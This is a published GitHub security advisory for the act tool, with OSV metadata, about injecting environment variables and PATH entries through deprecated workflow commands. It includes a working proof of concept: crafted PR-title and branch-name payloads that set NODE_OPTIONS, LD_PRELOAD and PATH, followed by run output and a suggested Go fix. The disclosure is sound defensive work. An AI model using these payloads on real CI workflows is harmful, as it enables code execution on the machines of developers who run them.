GHSA-XMGR-9PQC-H5VW
Vulnerability from github – Published: 2026-03-27 19:17 – Updated: 2026-03-31 18:40Summary
act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes act strictly less secure than GitHub Actions for the same workflow file.
Vulnerable Code
pkg/runner/command.go, lines 52-58:
switch command {
case "set-env":
rc.setEnv(ctx, kvPairs, arg)
case "set-output":
rc.setOutput(ctx, kvPairs, arg)
case "add-path":
rc.addPath(ctx, arg)
There is no check for the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable. The string ACTIONS_ALLOW_UNSECURE_COMMANDS does not appear anywhere in the act codebase.
On GitHub Actions, these commands are rejected unless ACTIONS_ALLOW_UNSECURE_COMMANDS=true is set:
Error: The `set-env` command is disabled. Please upgrade to using Environment Files
or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.
PoC: Environment and PATH Injection via PR Title
Tested on: act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0
Step 1 — Create a workflow that logs PR metadata:
.github/workflows/vuln.yml:
name: Vulnerable Workflow
on: [pull_request]
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Log PR info
run: |
echo "Processing PR: ${{ github.event.pull_request.title }}"
- name: Subsequent step - check environment
run: |
echo "=== Environment Injection Check ==="
echo "NODE_OPTIONS=$NODE_OPTIONS"
echo "EVIL_VAR=$EVIL_VAR"
echo "PATH=$PATH"
Step 2 — Create a malicious event payload:
event.json:
{
"pull_request": {
"title": "Fix typo\n::set-env name=EVIL_VAR::INJECTED_BY_ATTACKER\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js\n::add-path::/tmp/evil-bin",
"number": 1,
"head": { "ref": "fix-typo", "sha": "abc123" },
"base": { "ref": "main", "sha": "def456" }
}
}
Step 3 — Run:
git init && git add -A && git commit -m "init"
act pull_request -e event.json
Result:
[Vulnerable Workflow/build] | Processing PR: Fix typo
[Vulnerable Workflow/build] ⚙ ::set-env:: EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build] ⚙ ::set-env:: NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build] ⚙ ::add-path:: /tmp/evil-bin
[Vulnerable Workflow/build] ✅ Success - Main Log PR info
[Vulnerable Workflow/build] | === Environment Injection Check ===
[Vulnerable Workflow/build] | NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build] | EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build] | PATH=/tmp/evil-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[Vulnerable Workflow/build] | EXPLOITED: EVIL_VAR was injected into this step!
[Vulnerable Workflow/build] ✅ Success
[Vulnerable Workflow/build] 🏁 Job succeeded
All three injections succeeded silently:
- EVIL_VAR=INJECTED_BY_ATTACKER — arbitrary env var injected into subsequent step
- NODE_OPTIONS=--require=/tmp/evil.js — Node.js code execution vector
- /tmp/evil-bin prepended to PATH — command hijacking vector
Attack Scenarios
Scenario 1: Malicious PR title/body. An attacker opens a PR with ::set-env name=NODE_OPTIONS::--require=/tmp/evil.js embedded in the title. If any workflow step echoes the title (common for build summaries, Slack notifications, changelog generation), the injection fires. On GitHub Actions this is blocked. On act, it succeeds.
Scenario 2: Malicious branch name. ${{ github.head_ref }} is attacker-controlled. A branch named fix-typo%0A::set-env name=LD_PRELOAD::/tmp/evil.so can inject LD_PRELOAD, which causes every subsequent dynamically-linked binary to load the attacker's shared library.
Scenario 3: Commit message injection. If a step runs git log --oneline and the output flows to stdout, an attacker's commit message containing ::set-env:: commands will be processed.
Impact
- Command injection via env vars:
LD_PRELOAD,NODE_OPTIONS,PYTHONPATH,BASH_ENV,PERL5OPTall enable arbitrary code execution - PATH hijacking: attacker-controlled directory prepended to PATH hijacks any subsequent command
- Cross-step escalation: a step that merely logs untrusted data compromises all subsequent steps
- Supply chain risk: workflows that are safe on GitHub Actions become exploitable when run locally with act — developers have a false sense of security
Suggested Fix
Add a check matching GitHub Actions' behavior:
case "set-env":
if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
logger.Errorf("The `set-env` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
return false
}
rc.setEnv(ctx, kvPairs, arg)
case "add-path":
if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
logger.Errorf("The `add-path` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
return false
}
rc.addPath(ctx, arg)
This is a minimal, backwards-compatible fix — users who genuinely need these deprecated commands can opt in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true, matching GitHub's approach.
Written by Golan Myers
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.2.85"
},
"package": {
"ecosystem": "Go",
"name": "github.com/nektos/act"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.86"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34041"
],
"database_specific": {
"cwe_ids": [
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T19:17:00Z",
"nvd_published_at": "2026-03-31T03:15:58Z",
"severity": "HIGH"
},
"details": "## Summary\n\nact unconditionally processes the deprecated `::set-env::` and `::add-path::` workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes `act` strictly less secure than GitHub Actions for the same workflow file.\n\n## Vulnerable Code\n\n**`pkg/runner/command.go`, lines 52-58:**\n\n```go\nswitch command {\ncase \"set-env\":\n rc.setEnv(ctx, kvPairs, arg)\ncase \"set-output\":\n rc.setOutput(ctx, kvPairs, arg)\ncase \"add-path\":\n rc.addPath(ctx, arg)\n```\n\nThere is no check for the `ACTIONS_ALLOW_UNSECURE_COMMANDS` environment variable. The string `ACTIONS_ALLOW_UNSECURE_COMMANDS` does not appear anywhere in the act codebase.\n\nOn GitHub Actions, these commands are rejected unless `ACTIONS_ALLOW_UNSECURE_COMMANDS=true` is set:\n\n```\nError: The `set-env` command is disabled. Please upgrade to using Environment Files\n or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.\n```\n\n## PoC: Environment and PATH Injection via PR Title\n\n**Tested on:** act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0\n\n**Step 1 \u2014 Create a workflow that logs PR metadata:**\n\n`.github/workflows/vuln.yml`:\n```yaml\nname: Vulnerable Workflow\non: [pull_request]\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - name: Log PR info\n run: |\n echo \"Processing PR: ${{ github.event.pull_request.title }}\"\n\n - name: Subsequent step - check environment\n run: |\n echo \"=== Environment Injection Check ===\"\n echo \"NODE_OPTIONS=$NODE_OPTIONS\"\n echo \"EVIL_VAR=$EVIL_VAR\"\n echo \"PATH=$PATH\"\n```\n\n**Step 2 \u2014 Create a malicious event payload:**\n\n`event.json`:\n```json\n{\n \"pull_request\": {\n \"title\": \"Fix typo\\n::set-env name=EVIL_VAR::INJECTED_BY_ATTACKER\\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js\\n::add-path::/tmp/evil-bin\",\n \"number\": 1,\n \"head\": { \"ref\": \"fix-typo\", \"sha\": \"abc123\" },\n \"base\": { \"ref\": \"main\", \"sha\": \"def456\" }\n }\n}\n```\n\n**Step 3 \u2014 Run:**\n\n```bash\ngit init \u0026\u0026 git add -A \u0026\u0026 git commit -m \"init\"\nact pull_request -e event.json\n```\n\n**Result:**\n\n```\n[Vulnerable Workflow/build] | Processing PR: Fix typo\n[Vulnerable Workflow/build] \u2699 ::set-env:: EVIL_VAR=INJECTED_BY_ATTACKER\n[Vulnerable Workflow/build] \u2699 ::set-env:: NODE_OPTIONS=--require=/tmp/evil.js\n[Vulnerable Workflow/build] \u2699 ::add-path:: /tmp/evil-bin\n[Vulnerable Workflow/build] \u2705 Success - Main Log PR info\n\n[Vulnerable Workflow/build] | === Environment Injection Check ===\n[Vulnerable Workflow/build] | NODE_OPTIONS=--require=/tmp/evil.js\n[Vulnerable Workflow/build] | EVIL_VAR=INJECTED_BY_ATTACKER\n[Vulnerable Workflow/build] | PATH=/tmp/evil-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n[Vulnerable Workflow/build] | EXPLOITED: EVIL_VAR was injected into this step!\n[Vulnerable Workflow/build] \u2705 Success\n[Vulnerable Workflow/build] \ud83c\udfc1 Job succeeded\n```\n\nAll three injections succeeded silently:\n- `EVIL_VAR=INJECTED_BY_ATTACKER` \u2014 arbitrary env var injected into subsequent step\n- `NODE_OPTIONS=--require=/tmp/evil.js` \u2014 Node.js code execution vector\n- `/tmp/evil-bin` prepended to PATH \u2014 command hijacking vector\n\n## Attack Scenarios\n\n**Scenario 1: Malicious PR title/body.** An attacker opens a PR with `::set-env name=NODE_OPTIONS::--require=/tmp/evil.js` embedded in the title. If any workflow step echoes the title (common for build summaries, Slack notifications, changelog generation), the injection fires. On GitHub Actions this is blocked. On act, it succeeds.\n\n**Scenario 2: Malicious branch name.** `${{ github.head_ref }}` is attacker-controlled. A branch named `fix-typo%0A::set-env name=LD_PRELOAD::/tmp/evil.so` can inject `LD_PRELOAD`, which causes every subsequent dynamically-linked binary to load the attacker\u0027s shared library.\n\n**Scenario 3: Commit message injection.** If a step runs `git log --oneline` and the output flows to stdout, an attacker\u0027s commit message containing `::set-env::` commands will be processed.\n\n## Impact\n\n- **Command injection** via env vars: `LD_PRELOAD`, `NODE_OPTIONS`, `PYTHONPATH`, `BASH_ENV`, `PERL5OPT` all enable arbitrary code execution\n- **PATH hijacking**: attacker-controlled directory prepended to PATH hijacks any subsequent command\n- **Cross-step escalation**: a step that merely logs untrusted data compromises all subsequent steps\n- **Supply chain risk**: workflows that are safe on GitHub Actions become exploitable when run locally with act \u2014 developers have a false sense of security\n\n## Suggested Fix\n\nAdd a check matching GitHub Actions\u0027 behavior:\n\n```go\ncase \"set-env\":\n if rc.Env[\"ACTIONS_ALLOW_UNSECURE_COMMANDS\"] != \"true\" {\n logger.Errorf(\"The `set-env` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true\")\n return false\n }\n rc.setEnv(ctx, kvPairs, arg)\ncase \"add-path\":\n if rc.Env[\"ACTIONS_ALLOW_UNSECURE_COMMANDS\"] != \"true\" {\n logger.Errorf(\"The `add-path` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true\")\n return false\n }\n rc.addPath(ctx, arg)\n```\n\nThis is a minimal, backwards-compatible fix \u2014 users who genuinely need these deprecated commands can opt in via `ACTIONS_ALLOW_UNSECURE_COMMANDS=true`, matching GitHub\u0027s approach.\n\n---\n\nWritten by Golan Myers",
"id": "GHSA-xmgr-9pqc-h5vw",
"modified": "2026-03-31T18:40:50Z",
"published": "2026-03-27T19:17:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nektos/act/security/advisories/GHSA-xmgr-9pqc-h5vw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34041"
},
{
"type": "WEB",
"url": "https://github.com/nektos/act/commit/0c739c8e39c41aa5a07665f732da9cab6df0097a"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-mfwh-5m23-j46w"
},
{
"type": "PACKAGE",
"url": "https://github.com/nektos/act"
},
{
"type": "WEB",
"url": "https://github.com/nektos/act/releases/tag/v0.2.86"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "act: Unrestricted set-env and add-path command processing enables environment injection"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.